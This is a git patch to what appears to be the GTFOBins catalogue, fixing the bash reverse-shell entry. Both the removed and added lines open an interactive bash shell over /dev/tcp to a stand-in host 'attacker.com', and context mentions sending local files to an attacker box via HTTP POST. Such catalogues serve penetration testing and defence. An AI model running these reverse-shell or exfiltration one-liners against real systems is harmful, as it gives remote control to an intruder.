From ed2fa545ca8d56470cf8626623ba3867340a82b5 Mon Sep 17 00:00:00 2001 From: Andrea Cardaci Date: Sun, 3 May 2020 13:13:43 +0200 Subject: [PATCH] Fix bash revshell --- _gtfobins/bash.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/_gtfobins/bash.md b/_gtfobins/bash.md index 58cf1dd..967895a 100644 --- a/_gtfobins/bash.md +++ b/_gtfobins/bash.md @@ -7,7 +7,7 @@ functions: code: | export RHOST=attacker.com export RPORT=12345 - bash -c 'bash -i &>/dev/tcp/$RHOST/$RPORT 0<&1' + bash -c 'exec bash -i &>/dev/tcp/$RHOST/$RPORT <&1' file-upload: - description: Send local file in the body of an HTTP POST request. Run an HTTP service on the attacker box to collect the file. code: |